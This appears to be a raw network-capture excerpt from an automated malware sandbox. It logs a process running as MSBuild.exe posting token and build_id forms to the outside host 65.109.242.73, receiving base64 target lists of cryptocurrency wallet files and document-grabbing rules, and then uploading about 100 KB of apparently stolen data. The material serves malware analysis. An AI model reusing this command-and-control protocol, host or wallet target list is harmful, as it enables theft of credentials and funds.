                                                                                                                                                                                                                                            2024-04-18 08:10:44 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                                                                                                                                                                            Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                                                                                                                                                                            2024-04-18 08:10:44 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                                                                                                                                                                            Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            17192.168.2.44975465.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:45 UTC263OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 1145
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:45 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 4b 46 42 46 42 46 42 41 41 41 41 41 45 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------HJDAKFBFBFBAAAAAEBKJContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------HJDAKFBFBFBAAAAAEBKJCont
                                                                                                                                                                                                                                            2024-04-18 08:10:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:46 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            18192.168.2.44975565.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:46 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAK
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 4a 45 47 44 42 46 48 44 48 4a 4a 44 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------GHIJJJEGDBFHDHJJDBAKContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------GHIJJJEGDBFHDHJJDBAKCont
                                                                                                                                                                                                                                            2024-04-18 08:10:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:47 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            19192.168.2.44975665.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:48 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBG
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------CFCGIIEHIEGDGDGCAEBGCont
                                                                                                                                                                                                                                            2024-04-18 08:10:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:48 UTC71INData Raw: 33 63 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 3cRGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp80


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            20192.168.2.44975765.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:50 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 453
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:50 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------DAKJDHIEBFIIDGDGDBAECont
                                                                                                                                                                                                                                            2024-04-18 08:10:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:51 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            21192.168.2.44975865.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC265OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 100429
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------JDGHIIJKEBGIDHIDBKJDCont
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC16355OUTData Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                                                                                                                                                                                            Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC16355OUTData Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                                                                                                                                                                                            Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC16355OUTData Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 45 5a 74 71 4d 33 6f 4d 31 78 76 2f 43 56 58 74 78 71 2f 6b 78 71 6b 63 4b 71 54 74 78 6b 6e 36 6d 75 76 6e 2f 34 39 35 66 39 77 2f 79 72 79 7a 53 32 4d 6d 70 58 44 6e 2b 47 49 38 2f 69 4b 38 62 4e 71 39 53 6c 79 71 44 74 65 35 39 48 77 2f 68 4b 46 62 6e 6c 56 69 6e 61 32 2f 7a 4f 34 6a 38 53 42 65 4a 34 66 78 51 2f 30 71 39 44 72 75 6d 79 34 48 32 70 49 32 4a 78 69 51 37
                                                                                                                                                                                                                                            Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UEZtqM3oM1xv/CVXtxq/kxqkcKqTtxkn6muvn/495f9w/yryzS2MmpXDn+GI8/iK8bNq9SlyqDte59Hw/hKFbnlVina2/zO4j8SBeJ4fxQ/0q9Drumy4H2pI2JxiQ7
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC16355OUTData Raw: 46 46 47 4b 4b 42 69 55 55 37 48 74 53 45 55 41 4a 52 53 38 65 6f 6f 79 6f 6f 75 67 45 6f 6f 33 44 30 70 4e 2f 73 4b 4c 6f 4c 4d 4d 55 75 44 54 64 35 70 4e 78 50 63 30 58 48 59 66 69 67 34 48 63 56 48 6e 33 70 4b 4c 6a 73 53 5a 58 31 70 4e 79 30 79 6b 6f 48 59 6b 33 2b 31 4a 35 68 37 55 79 69 67 4c 44 69 35 50 65 6b 7a 37 30 32 69 67 64 67 34 6f 2f 47 69 6b 6f 47 4c 52 6d 6b 6f 6f 47 47 61 53 69 69 67 41 70 4b 57 6d 35 6f 47 4c 53 47 6c 70 4b 41 73 46 46 46 4a 51 4d 44 52 51 61 53 6d 41 55 5a 70 4b 4b 4c 6a 43 6b 4a 70 61 53 67 59 55 6c 4c 53 55 41 49 61 4b 44 52 51 4d 53 69 69 69 69 34 77 70 4b 57 6b 70 67 4a 53 38 55 47 6b 70 6a 43 6b 4e 4c 52 51 4d 53 69 69 69 6b 4d 4b 53 6c 70 4b 41 43 69 69 69 67 42 44 52 51 61 4b 41 45 6f 70 61 53 67 59 55 55 55 55
                                                                                                                                                                                                                                            Data Ascii: FFGKKBiUU7HtSEUAJRS8eooyoougEoo3D0pN/sKLoLMMUuDTd5pNxPc0XHYfig4HcVHn3pKLjsSZX1pNy0ykoHYk3+1J5h7UyigLDi5Pekz702igdg4o/GikoGLRmkooGGaSiigApKWm5oGLSGlpKAsFFFJQMDRQaSmAUZpKKLjCkJpaSgYUlLSUAIaKDRQMSiiii4wpKWkpgJS8UGkpjCkNLRQMSiiikMKSlpKACiiigBDRQaKAEopaSgYUUUU
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC16355OUTData Raw: 69 67 30 55 41 46 4a 53 30 6c 41 77 70 4b 57 6b 4e 41 42 52 52 52 54 47 42 70 4b 55 30 6c 41 42 53 55 74 4a 51 4d 4b 51 30 74 4a 51 41 55 68 70 61 53 67 59 55 55 55 47 67 42 4b 51 30 74 4a 51 4d 4b 44 52 51 61 42 69 55 55 55 55 44 45 6f 4e 46 42 70 67 49 61 53 6c 70 44 51 4d 4b 53 6c 4e 4a 51 4d 4b 53 6c 70 4b 41 43 67 30 55 6c 41 77 70 4b 57 6b 70 6a 41 30 6c 46 46 41 78 4b 4b 4f 39 46 41 43 55 68 70 65 39 4a 51 4d 4b 53 6c 4e 4a 51 4d 4b 53 6c 70 4b 42 68 53 55 55 68 6f 47 46 4a 53 30 6c 41 42 53 47 6c 70 4b 42 67 61 53 69 6b 4e 41 77 6f 4e 46 42 6f 47 4a 53 64 36 44 52 51 4d 53 69 69 69 67 59 6c 42 6f 6f 4e 41 78 4b 53 67 30 55 77 51 47 6b 70 54 53 55 68 69 55 6c 4c 53 55 46 43 64 36 44 51 4b 4b 41 45 70 4d 55 74 4a 54 4b 44 74 53 55 74 4a 51 41 6c 46
                                                                                                                                                                                                                                            Data Ascii: ig0UAFJS0lAwpKWkNABRRRTGBpKU0lABSUtJQMKQ0tJQAUhpaSgYUUUGgBKQ0tJQMKDRQaBiUUUUDEoNFBpgIaSlpDQMKSlNJQMKSlpKACg0UlAwpKWkpjA0lFFAxKKO9FACUhpe9JQMKSlNJQMKSlpKBhSUUhoGFJS0lABSGlpKBgaSikNAwoNFBoGJSd6DRQMSiiigYlBooNAxKSg0UwQGkpTSUhiUlLSUFCd6DQKKAEpMUtJTKDtSUtJQAlF
                                                                                                                                                                                                                                            2024-04-18 08:10:52 UTC2299OUTData Raw: 6d 30 4f 66 56 6a 31 50 34 31 79 39 46 46 6b 4f 37 43 69 69 69 6d 49 78 36 4b 4b 4b 59 6a 70 62 37 34 67 65 4c 4c 32 2f 75 62 76 2f 68 49 64 55 74 2f 50 6c 61 54 79 59 4c 32 56 49 34 39 78 4a 32 71 75 37 68 52 6e 41 48 70 55 45 2f 69 2f 56 72 75 37 74 72 75 38 6d 2b 31 33 4d 46 68 4e 59 43 61 34 5a 33 64 34 35 52 4b 43 57 59 74 6b 73 42 4d 77 48 59 59 58 67 34 35 77 61 4b 56 6b 4f 37 43 69 69 69 67 51 55 55 55 55 77 50 53 37 6a 34 6f 32 39 2f 42 62 78 33 47 6e 54 51 65 51 67 55 47 4f 51 50 75 34 48 72 6a 48 54 33 71 61 34 2b 4c 4e 72 65 57 2f 32 64 39 44 4d 43 6e 72 49 6b 77 59 6a 48 50 54 61 50 35 31 35 64 52 57 43 77 31 4b 4b 70 78 53 30 70 75 38 64 58 75 33 66 76 72 72 33 4c 63 35 4e 7a 62 2b 33 6f 2f 75 73 64 76 34 6c 38 66 52 36 35 34 62 58 52 59 72
